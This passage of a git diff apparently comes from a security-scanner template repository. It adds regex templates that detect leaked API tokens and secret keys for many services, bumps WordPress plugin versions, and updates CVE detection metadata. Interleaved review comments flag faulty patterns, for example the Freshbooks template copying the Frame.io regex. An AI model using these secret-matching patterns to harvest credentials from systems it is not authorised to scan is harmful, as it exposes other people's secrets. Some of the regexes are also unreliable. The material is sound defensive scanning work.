+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.yaml
+ metadata:
+ verified: true
+ tags: easypost,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - EZTK(?i)[a-z0-9]{54}
\ No newline at end of file
diff --git a/file/keys/etsy-access-token.yaml b/file/keys/etsy-access-token.yaml
new file mode 100644
index 0000000000..a3ee2d3c1c
--- /dev/null
+++ b/file/keys/etsy-access-token.yaml
@@ -0,0 +1,22 @@
+id: etsy-access-token
+
+info:
+ name: Etsy Access Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.go
+ metadata:
+ verified: true
+ tags: etsy,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:etsy)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/facebook/facebook-api-token.yaml b/file/keys/facebook/facebook-api-token.yaml
new file mode 100644
index 0000000000..a0a5aa0f54
--- /dev/null
+++ b/file/keys/facebook/facebook-api-token.yaml
@@ -0,0 +1,22 @@
+id: facebook-api-token
+
+info:
+ name: Facebook API Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.go
+ metadata:
+ verified: true
+ tags: facebook,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:facebook)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/fastly-api-token.yaml b/file/keys/fastly-api-token.yaml
new file mode 100644
index 0000000000..d3376d968c
--- /dev/null
+++ b/file/keys/fastly-api-token.yaml
@@ -0,0 +1,22 @@
+id: fastly-api-token
+
+info:
+ name: Fastly API Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.go
+ metadata:
+ verified: true
+ tags: fastly,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:fastly)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/finicity/finicity-api-token.yaml b/file/keys/finicity/finicity-api-token.yaml
new file mode 100644
index 0000000000..4a18214f75
--- /dev/null
+++ b/file/keys/finicity/finicity-api-token.yaml
@@ -0,0 +1,22 @@
+id: finicity-api-token
+
+info:
+ name: Finicity API Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.go
+ metadata:
+ verified: true
+ tags: finicity,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/finicity/finicity-client-secret.yaml b/file/keys/finicity/finicity-client-secret.yaml
new file mode 100644
index 0000000000..8a88cebb18
--- /dev/null
+++ b/file/keys/finicity/finicity-client-secret.yaml
@@ -0,0 +1,22 @@
+id: finicity-client-secret
+
+info:
+ name: Finicity Client Secret
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-client-secret.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-client-secret.go
+ metadata:
+ verified: true
+ tags: finicity,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/finnhub-access-token.yaml b/file/keys/finnhub-access-token.yaml
new file mode 100644
index 0000000000..2b830ded34
--- /dev/null
+++ b/file/keys/finnhub-access-token.yaml
@@ -0,0 +1,22 @@
+id: finnhub-access-token
+
+info:
+ name: Finnhub Access Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.go
+ metadata:
+ verified: true
+ tags: finnhub,file,token
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:finnhub)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/flickr-access-token.yaml b/file/keys/flickr-access-token.yaml
new file mode 100644
index 0000000000..65c5988c6b
--- /dev/null
+++ b/file/keys/flickr-access-token.yaml
@@ -0,0 +1,22 @@
+id: flickr-access-token
+
+info:
+ name: Flickr Access Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.go
+ metadata:
+ verified: true
+ tags: flickr,file,keys
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:flickr)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/flutter/flutterwave-encryption-key.yaml b/file/keys/flutter/flutterwave-encryption-key.yaml
new file mode 100644
index 0000000000..10d2054403
--- /dev/null
+++ b/file/keys/flutter/flutterwave-encryption-key.yaml
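Review bot: `file/keys/flickr-access-token.yaml` is tagged `flickr,file,keys` while the other *-access-token templates in this commit (etsy, finnhub, finicity, droneci, datadog, codecov) all use `<vendor>,file,token`, so a run filtered with `-tags token` would silently skip the Flickr template while picking up its siblings. `tags: flickr,file,token` matches its name and the rest of the set. `frameio-api-token.yaml` later in this change has the same `keys` tag on a token template.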
@@ -0,0 +1,22 @@
+id: flutterwave-encryption-key
+
+info:
+ name: Flutterwave Encryption Key
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.go
+ metadata:
+ verified: true
+ tags: flutter,file,keys,flutterwave
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - FLWSECK_TEST-(?i)[a-h0-9]{12}
\ No newline at end of file
diff --git a/file/keys/flutter/flutterwave-public-key.yaml b/file/keys/flutter/flutterwave-public-key.yaml
new file mode 100644
index 0000000000..32c4fcea3f
--- /dev/null
+++ b/file/keys/flutter/flutterwave-public-key.yaml
@@ -0,0 +1,22 @@
+id: flutterwave-public-key
+
+info:
+ name: Flutterwave Public Key
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.go
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.yaml
+ metadata:
+ verified: true
+ tags: flutter,file,keys,flutterwave
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - FLWPUBK_TEST-(?i)[a-h0-9]{32}-X
\ No newline at end of file
diff --git a/file/keys/flutter/flutterwave-secret-key.yaml b/file/keys/flutter/flutterwave-secret-key.yaml
new file mode 100644
index 0000000000..cb8f91ca1a
--- /dev/null
+++ b/file/keys/flutter/flutterwave-secret-key.yaml
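Review bot: The `regex` entry `FLWSECK_TEST-(?i)[a-h0-9]{12}` only matches keys that carry the `_TEST` marker, and the same holds for the flutterwave-public-key hunk below it (`FLWPUBK_TEST-…`) and the flutterwave-secret-key hunk on the next line (`FLWSECK_TEST-…-X`). I can't confirm Flutterwave's live-key format from this diff, but if production keys use a prefix without `_TEST`, the secrets that actually matter are never extracted; that should be checked against the referenced gitleaks rules before `verified: true` is claimed. Either way the `name` should say what is matched, e.g. `name: Flutterwave Test Encryption Key`, or a `description:` line should state that only test-mode keys are covered. Note also that `(?i)` sits after the literal prefix, so the prefix is case-sensitive while the body is not; if that split is intended it deserves a comment.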
@@ -0,0 +1,22 @@
+id: flutterwave-secret-key
+
+info:
+ name: Flutterwave Secret Key
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.go
+ metadata:
+ verified: true
+ tags: flutter,file,keys,flutterwave
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - FLWSECK_TEST-(?i)[a-h0-9]{32}-X
\ No newline at end of file
diff --git a/file/keys/frameio-api-token.yaml b/file/keys/frameio-api-token.yaml
new file mode 100644
index 0000000000..352f232f82
--- /dev/null
+++ b/file/keys/frameio-api-token.yaml
@@ -0,0 +1,22 @@
+id: frameio-api-token
+
+info:
+ name: Frameio API Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.go
+ metadata:
+ verified: true
+ tags: frameio,file,keys
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - fio-u-(?i)[a-z0-9\-_=]{64}
\ No newline at end of file
diff --git a/file/keys/freshbooks-access-token.yaml b/file/keys/freshbooks-access-token.yaml
new file mode 100644
index 0000000000..14653518fe
--- /dev/null
+++ b/file/keys/freshbooks-access-token.yaml
@@ -0,0 +1,22 @@
+id: freshbooks-access-token
+
+info:
+ name: Freshbooks Access Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.go
+ metadata:
+ verified: true
+ tags: freshbooks,file,keys
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - fio-u-(?i)[a-z0-9\-_=]{64}
\ No newline at end of file
diff --git a/file/keys/gitter-access-token.yaml b/file/keys/gitter-access-token.yaml
new file mode 100644
index 0000000000..dd4c03ce53
--- /dev/null
+++ b/file/keys/gitter-access-token.yaml
@@ -0,0 +1,22 @@
+id: gitter-access-token
+
+info:
+ name: Gitter Access Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.go
+ metadata:
+ verified: true
+ tags: gitter,file,keys
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:gitter)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{40})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/gocardless-api-token.yaml b/file/keys/gocardless-api-token.yaml
new file mode 100644
index 0000000000..ab55b0aacb
--- /dev/null
+++ b/file/keys/gocardless-api-token.yaml
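Review bot: The `regex` entry `fio-u-(?i)[a-z0-9\-_=]{64}` is byte-for-byte the Frame.io pattern from the frameio-api-token hunk on the previous line, so this template will report Frame.io tokens under the Freshbooks name and is unlikely to match anything Freshbooks-shaped. The correct pattern should be taken from the referenced gitleaks rule `freshbooks-access-token`; I can't verify the token format from this diff, but the other keyword-anchored templates in this commit suggest the `(?i)(?:freshbooks)(?:[0-9a-z\-_\t .]{0,20})…` shape rather than a `fio-u-` prefix. `verified: true` should be removed until the regex has been exercised against a real sample.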
@@ -0,0 +1,22 @@
+id: gocardless-api-token
+
+info:
+ name: Gocardless API Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gocardless-api-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gocardless-api-token.go
+ metadata:
+ verified: true
+ tags: gocardless,file,keys
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:gocardless)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(live_(?i)[a-z0-9\-_=]{40})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/grafana/grafana-api-key.yaml b/file/keys/grafana/grafana-api-key.yaml
new file mode 100644
index 0000000000..af821a6060
--- /dev/null
+++ b/file/keys/grafana/grafana-api-key.yaml
@@ -0,0 +1,22 @@
+id: grafana-api-key
+
+info:
+ name: Grafana API Key
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.go
+ metadata:
+ verified: true
+ tags: grafana,file,keys
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)\b(eyJrIjoi[A-Za-z0-9]{70,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/grafana/grafana-cloud-api-token.yaml b/file/keys/grafana/grafana-cloud-api-token.yaml
new file mode 100644
index 0000000000..20ec44482c
--- /dev/null
+++ b/file/keys/grafana/grafana-cloud-api-token.yaml
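Review bot: The capture `(eyJrIjoi[A-Za-z0-9]{70,400}={0,2})` in the grafana-api-key hunk allows only the alphanumeric subset of base64, yet the `={0,2}` padding and the `eyJrIjoi` prefix indicate the value is standard base64, whose alphabet also includes `+` and `/`; a key whose encoded payload contains either character is cut short at that point and then rejected by the trailing `(?:['|\"|\n|\r|\s|\x60|;]|$)` boundary. The grafana-cloud-api-token hunk that follows already uses `[A-Za-z0-9+/]`, so I'd align this one: `- (?i)\b(eyJrIjoi[A-Za-z0-9+/]{70,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$)`. The leading `(?i)` also makes the `eyJrIjoi` prefix case-insensitive even though base64 is case-sensitive; if the prefix is meant to be exact, dropping `(?i)` would cut false positives.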
@@ -0,0 +1,22 @@
+id: grafana-cloud-api-token
+
+info:
+ name: Grafana Cloud API Key
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.go
+ metadata:
+ verified: true
+ tags: grafana,file,keys
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)\b(glc_[A-Za-z0-9+/]{32,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/grafana/grafana-service-account-token.yaml b/file/keys/grafana/grafana-service-account-token.yaml
new file mode 100644
index 0000000000..fc5748771e
--- /dev/null
+++ b/file/keys/grafana/grafana-service-account-token.yaml
@@ -0,0 +1,22 @@
+id: grafana-service-account-token
+
+info:
+ name: Grafana Service Account Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.go
+ metadata:
+ verified: true
+ tags: grafana,file,keys
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)\b(glsa_[A-Za-z0-9]{32}_[A-Fa-f0-9]{8})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/file/keys/hashicorp-api-token.yaml b/file/keys/hashicorp-api-token.yaml
new file mode 100644
index 0000000000..ca0b289484
--- /dev/null
+++ b/file/keys/hashicorp-api-token.yaml
@@ -0,0 +1,22 @@
+id: hashicorp-api-token
+
+info:
+ name: Hashicorp API Token
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.go
+ metadata:
+ verified: true
+ tags: hashicorp,file,keys
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)[a-z0-9]{14}\.atlasv1\.[a-z0-9\-_=]{60,70}
\ No newline at end of file
diff --git a/file/keys/zendesk-secret-key.yaml b/file/keys/zendesk-secret-key.yaml
new file mode 100644
index 0000000000..79c1fa37ee
--- /dev/null
+++ b/file/keys/zendesk-secret-key.yaml
@@ -0,0 +1,22 @@
+id: zendesk-secret-key
+
+info:
+ name: Zendesk Secret Key
+ author: DhiyaneshDK
+ severity: info
+ reference:
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.yaml
+ - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.go
+ metadata:
+ verified: true
+ tags: zendesk,file,keys
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - (?i)(?:zendesk)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$)
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/all-404-redirect-to-homepage.txt b/helpers/wordpress/plugins/all-404-redirect-to-homepage.txt
index 8012ebbba2..89f71c74ce 100644
--- a/helpers/wordpress/plugins/all-404-redirect-to-homepage.txt
+++ b/helpers/wordpress/plugins/all-404-redirect-to-homepage.txt
@@ -1 +1 @@
-4.2
\ No newline at end of file
+4.3
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/contact-form-cfdb7.txt b/helpers/wordpress/plugins/contact-form-cfdb7.txt
index 246d157007..a1a862fee8 100644
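Review bot: `name: Hashicorp API Token` and `id: hashicorp-api-token` describe a broader thing than the pattern detects: the `.atlasv1.` segment and the referenced gitleaks rule name `hashicorp-tf-api-token` both point at a Terraform (Cloud/Enterprise) API token specifically, not a generic HashiCorp token for Vault, Consul or Nomad. I'd rename to `name: HashiCorp Terraform API Token` and add the product to the tags, `tags: hashicorp,terraform,file,keys`, so the finding reads correctly and is filterable; the id can stay as is if it has already been published. The vendor spells its name HashiCorp.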
--- a/helpers/wordpress/plugins/contact-form-cfdb7.txt
+++ b/helpers/wordpress/plugins/contact-form-cfdb7.txt
@@ -1 +1 @@
-1.2.6.5
\ No newline at end of file
+1.2.6.6
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt
index 182ea559ba..f05e61d963 100644
--- a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt
+++ b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt
@@ -1 +1 @@
-5.8.2
\ No newline at end of file
+5.8.3
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/google-site-kit.txt b/helpers/wordpress/plugins/google-site-kit.txt
index 250205ed1c..e60643c3b1 100644
--- a/helpers/wordpress/plugins/google-site-kit.txt
+++ b/helpers/wordpress/plugins/google-site-kit.txt
@@ -1 +1 @@
-1.104.0
\ No newline at end of file
+1.105.0
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/host-webfonts-local.txt b/helpers/wordpress/plugins/host-webfonts-local.txt
index 4cc0e35cb3..566ac6388b 100644
--- a/helpers/wordpress/plugins/host-webfonts-local.txt
+++ b/helpers/wordpress/plugins/host-webfonts-local.txt
@@ -1 +1 @@
-5.6.0
\ No newline at end of file
+5.6.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/insert-headers-and-footers.txt b/helpers/wordpress/plugins/insert-headers-and-footers.txt
index 476ede462b..02af9df7c9 100644
--- a/helpers/wordpress/plugins/insert-headers-and-footers.txt
+++ b/helpers/wordpress/plugins/insert-headers-and-footers.txt
@@ -1 +1 @@
-2.0.13
\ No newline at end of file
+2.0.13.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/loginizer.txt b/helpers/wordpress/plugins/loginizer.txt
index cb1ad9b47f..afa2b3515e 100644
--- a/helpers/wordpress/plugins/loginizer.txt
+++ b/helpers/wordpress/plugins/loginizer.txt
@@ -1 +1 @@
-1.7.9
\ No newline at end of file
+1.8.0
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/meta-box.txt b/helpers/wordpress/plugins/meta-box.txt
index 23900d674d..4b1e48ed97 100644
--- a/helpers/wordpress/plugins/meta-box.txt
+++ b/helpers/wordpress/plugins/meta-box.txt
@@ -1 +1 @@
-5.7.3
\ No newline at end of file
+5.7.4
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/seo-by-rank-math.txt b/helpers/wordpress/plugins/seo-by-rank-math.txt
index 756252de31..fab0a4f300 100644
--- a/helpers/wordpress/plugins/seo-by-rank-math.txt
+++ b/helpers/wordpress/plugins/seo-by-rank-math.txt
@@ -1 +1 @@
-1.0.119
\ No newline at end of file
+1.0.119.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/so-widgets-bundle.txt b/helpers/wordpress/plugins/so-widgets-bundle.txt
index daf515c92d..d4f820371f 100644
--- a/helpers/wordpress/plugins/so-widgets-bundle.txt
+++ b/helpers/wordpress/plugins/so-widgets-bundle.txt
@@ -1 +1 @@
-1.50.1
\ No newline at end of file
+1.52.0
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt
index 50aea0e7ab..e3a4f19336 100644
--- a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt
+++ b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt
@@ -1 +1 @@
-2.1.0
\ No newline at end of file
+2.2.0
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/woocommerce-services.txt b/helpers/wordpress/plugins/woocommerce-services.txt
index cc6612c36e..a6254504e4 100644
--- a/helpers/wordpress/plugins/woocommerce-services.txt
+++ b/helpers/wordpress/plugins/woocommerce-services.txt
@@ -1 +1 @@
-2.3.0
\ No newline at end of file
+2.3.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/woocommerce.txt b/helpers/wordpress/plugins/woocommerce.txt
index a33192706f..84c5308f03 100644
--- a/helpers/wordpress/plugins/woocommerce.txt
+++ b/helpers/wordpress/plugins/woocommerce.txt
@@ -1 +1 @@
-7.8.2
\ No newline at end of file
+7.9.0
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/wordfence.txt b/helpers/wordpress/plugins/wordfence.txt
index 202d1aaff4..5a4adf1c89 100644
--- a/helpers/wordpress/plugins/wordfence.txt
+++ b/helpers/wordpress/plugins/wordfence.txt
@@ -1 +1 @@
-7.10.1
\ No newline at end of file
+7.10.2
\ No newline at end of file
diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml
index 362743df8f..0f50435ab9 100644
--- a/http/cves/2000/CVE-2000-0114.yaml
+++ b/http/cves/2000/CVE-2000-0114.yaml
@@ -3,20 +3,25 @@ id: CVE-2000-0114 info: name: Microsoft FrontPage Extensions Check (shtml.dll) author: r3naissance - severity: low + severity: medium description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. reference: - https://nvd.nist.gov/vuln/detail/CVE-2000-0114 - https://www.exploit-db.com/exploits/19897 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/CVE-2000-0114 + remediation: Upgrade to the latest version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2000-0114 cwe-id: NVD-CWE-Other - cvss-score: 5.0 - remediation: Upgrade to the latest version. - tags: cve,cve2000,frontpage,microsoft,edb + epss-score: 0.09258 + cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: microsoft + product: internet_information_server + tags: cve,cve2000,frontpage,microsoft,edb http: - method: GET
@@ -25,11 +30,11 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: - "_vti_bin/shtml.dll" + + - type: status + status: + - 200
diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml
index 37b2b32615..c0c83df526 100644
--- a/http/cves/2001/CVE-2001-0537.yaml
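Review bot: `cvss-score: 5` in the classification block of the CVE-2000-0114 hunk replaces the earlier `5.0`, which turns the YAML scalar from a float into an integer; every other score touched in this commit (`4.3`, `6.8`, `7.5`, `9.3`) stays a float, so any consumer or template linter that types `cvss-score` as a float will treat this file differently from its neighbours. The same `cvss-score: 5` appears in the CVE-2005-2428, CVE-2005-3634 and CVE-2007-4504 hunks further down. I'd write `cvss-score: 5.0` in all four.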
+++ b/http/cves/2001/CVE-2001-0537.yaml @@ -3,22 +3,27 @@ id: CVE-2001-0537 info: name: Cisco IOS HTTP Configuration - Authentication Bypass author: DhiyaneshDK - severity: medium + severity: critical description: | HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL. reference: - - https://web.archive.org/web/20030720224553/https://www.securityfocus.com/bid/2936 - https://www.rapid7.com/db/modules/auxiliary/scanner/http/cisco_ios_auth_bypass/ - https://nvd.nist.gov/vuln/detail/CVE-2001-0537 + - http://www.ciac.org/ciac/bulletins/l-106.shtml + - https://exchange.xforce.ibmcloud.com/vulnerabilities/6749 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C + cvss-score: 9.3 cve-id: CVE-2001-0537 cwe-id: CWE-287 - cvss-score: 5.0 + epss-score: 0.89071 + cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:* metadata: max-request: 1 verified: true shodan-query: product:"Cisco IOS http config" && 200 + vendor: cisco + product: ios tags: cve,cve2001,cisco,ios,auth-bypass http: diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 5db70c3d4d..8243b9f833 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml 
